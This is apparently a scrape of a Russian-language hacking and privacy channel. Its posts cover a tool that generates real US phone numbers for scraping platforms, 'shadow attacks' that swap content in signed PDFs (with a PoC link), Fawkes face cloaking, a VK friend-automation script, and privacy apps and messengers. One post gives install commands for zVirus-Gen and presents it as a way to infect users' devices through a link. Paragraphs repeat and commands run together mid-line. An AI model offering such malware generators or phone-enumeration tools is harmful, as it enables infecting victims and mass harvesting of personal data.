phonerator - инструмент от создателя утилиты email2phonenumber, позволяющий генерировать реально существующие номера телефонов по маске. Поддерживает фильтрацию по местоположению и оператору, а также экспорт в .vcf для дальнейшего импорта в телефонную книгу.
Создан, в том числе, для "извлечения общедоступных сведений с некоторых платформ, используя их особенности" https://about.fb.com/news/2021/04/facts-on-news-reports-about-facebook-data/ 😅
Пока что только американские номера.
Создан, в том числе, для "извлечения общедоступных сведений с некоторых платформ, используя их особенности" https://about.fb.com/news/2021/04/facts-on-news-reports-about-facebook-data/ 😅
Пока что только американские номера.
Shadow Attacks Hiding and Replacing Content in Signed PDFs.pdf
1.3 MB
Подробности реализации теневых атак на PDF-документы.
Позволяют изменять визуальное содержимое подписанных электронной подписью PDF, не "ломая" при этом саму подпись.
Реализуются следующим образом. Злоумышленник создает документ с двумя различными содержаниями: первое - содержимое, которое ожидается стороной, подписывающей документ, второе - то, что должна увидеть жертва при открытии. В PDF также вставляется вредоносный JS-код, отвечающий за подмену легитимного содержимого и биндится, например, на закрытие файла.
Сторона, отвечающая за подпись, открывает файл, видит легитимное содержимое, и подписывает его. Перед самым закрытием, срабатывает код и подменяет визуальное содержимое на то, что увидит жертва. PDF-файл отправляется обратно к злоумышленнику и тот использует его уже по своему назначению.
Подробности публично представлены в феврале. Подвержены 16 средств для просмотра PDF, в том числе Adobe Acrobat, Perfect PDF, Foxit Reader и Okular.
PoC: https://github.com/RUB-NDS/pdf-attacker
Позволяют изменять визуальное содержимое подписанных электронной подписью PDF, не "ломая" при этом саму подпись.
Реализуются следующим образом. Злоумышленник создает документ с двумя различными содержаниями: первое - содержимое, которое ожидается стороной, подписывающей документ, второе - то, что должна увидеть жертва при открытии. В PDF также вставляется вредоносный JS-код, отвечающий за подмену легитимного содержимого и биндится, например, на закрытие файла.
Сторона, отвечающая за подпись, открывает файл, видит легитимное содержимое, и подписывает его. Перед самым закрытием, срабатывает код и подменяет визуальное содержимое на то, что увидит жертва. PDF-файл отправляется обратно к злоумышленнику и тот использует его уже по своему назначению.
Подробности публично представлены в феврале. Подвержены 16 средств для просмотра PDF, в том числе Adobe Acrobat, Perfect PDF, Foxit Reader и Okular.
PoC: https://github.com/RUB-NDS/pdf-attacker
Прячем лицо от ИИ с помощью Termux
Fawkes - это система защиты конфиденциальности, разработанная исследователями из SANDLab Чикагского университета.
Установка
Обновим пакеты:
Fawkes - это система защиты конфиденциальности, разработанная исследователями из SANDLab Чикагского университета.
Установка
Обновим пакеты:
apt update -yКачаем гит и питон:
apt upgrade -y
apt install gitТеперь сам инструмент:
apt install python
git clone https://github.com/Shawn-Shan/fawkesОткрываем папку:
cd fawkesТеперь нужно его установить:
python setup.py installКидаем фотку в любую папку и вот так вот запускаем:
fawkes -d директория/к/папке/с/фотками --mode minТеперь ни один ИИ не распознает ваше лицо ✌️
Скрипт на автоматизацию действий ВКонтакте для Termux
Айо, бандиты. Перед вами отличный бесплатный скрипт, который позволит: добавить друзей со стен/страниц, добавить друзей из рекомендаций, принять новые заявки в друзья, принять все заявки в друзья, отписаться от всех исходящих заявок, удалить неактивных друзей, удалить невидимых друзей, удалить собак из друзей, удалить всех друзей.
Запуск
Айо, бандиты. Перед вами отличный бесплатный скрипт, который позволит: добавить друзей со стен/страниц, добавить друзей из рекомендаций, принять новые заявки в друзья, принять все заявки в друзья, отписаться от всех исходящих заявок, удалить неактивных друзей, удалить невидимых друзей, удалить собак из друзей, удалить всех друзей.
pkg update -y(Если вылезет ошибка, то вводим это:
pkg upgrade -y
install git
apt update && apt upgrade -y apt install git python
termux-setup-storage
git clone https://github.com/Matazimov/VK
cd VK
pip install -r requirements.txt
pip install --upgrade pip только без cd VK)Запуск
python start.pyДалее нас просят ввести токен ВКонтакте. После авторизации мы попадаем на пустой сайт, там копируем свой токен и вставляем в Termux. После выхода из термукса, чтобы запустить этот скрипт снова вводим эти команды:
cd VKМастхэв для арбитража в Вконтактике ✌️
python start.py
И вставляем свой токен
👍1
Заражаем устройства пользователей по ссылке
zVirus - утилита, включающая в себя множество вирусов для различных ос.
Установка:
zVirus - утилита, включающая в себя множество вирусов для различных ос.
Установка:
apt update
apt install git -y
git clone https://github.com/ZechBron/zVirus-Gen
Использованиеcd zVirus-Gen
bash setup.sh
bash zVirus
После чего выбираем ос и вирус, который нам по душе. Утилита выдаст нам ссылку, при переходе на которую начнется установка выбранного вируса ✌️
Ruin My Search History — анти-Google утилита, которая путает и «портит» историю ваших поисковых запросов в гугле. Генерируя случайные поисковые запросы, этот инструмент не позволяет Google создать точную картину того, кто вы есть.
Можно поставить 150 рандомных запросов.
Разумеется, инструмент будет полезен только для тех, кто прибегает к поиску Google. Надеюсь, что большинство моей аудитории использует такие поисковые системы как searX, Qwant, Mojeek, YaCy и другие приватные альтернативы.
#сайт #сервис
Можно поставить 150 рандомных запросов.
Разумеется, инструмент будет полезен только для тех, кто прибегает к поиску Google. Надеюсь, что большинство моей аудитории использует такие поисковые системы как searX, Qwant, Mojeek, YaCy и другие приватные альтернативы.
#сайт #сервис
👍1
Fennec F-Droid — форк браузера Mozilla Firefox для Android, заточенный на приватность.
— Встроенная блокировка более чем 2000 он-лайн трекеров
— Режим приватного сёрфинга веб-страниц
— Есть тёмная тема
— Режим "картинка в картинке"
#приложение #браузер #Android
— Встроенная блокировка более чем 2000 он-лайн трекеров
— Режим приватного сёрфинга веб-страниц
— Есть тёмная тема
— Режим "картинка в картинке"
#приложение #браузер #Android
Подборка безопасных мессенджеров. Часть 1.
🔓 ChatSecure — бесплатный открытый клиент для обмена сообщений с поддержкой OTR-шифрования по протоколу XMPP. Для iOS.
🤫 Silence — мессенджер, который предназначен для обмена зашифрованными SMS и MMS сообщениями.
🌠 Adamant — анонимный и защищённый мессенджер, работающий на блокчейне Ethereum.
👾 GoTor Messenger — безопасный мессенджер, работающий через Tor сеть.
🔥 FireChat — один оффлайн мессенджер для пользователей Android. Использует для связи Wi-Fi + Bluetooth, имеет встроенное сквозное шифрование сообщений.
#мессенджер #анонимность
🔓 ChatSecure — бесплатный открытый клиент для обмена сообщений с поддержкой OTR-шифрования по протоколу XMPP. Для iOS.
🤫 Silence — мессенджер, который предназначен для обмена зашифрованными SMS и MMS сообщениями.
🌠 Adamant — анонимный и защищённый мессенджер, работающий на блокчейне Ethereum.
👾 GoTor Messenger — безопасный мессенджер, работающий через Tor сеть.
🔥 FireChat — один оффлайн мессенджер для пользователей Android. Использует для связи Wi-Fi + Bluetooth, имеет встроенное сквозное шифрование сообщений.
#мессенджер #анонимность
👍1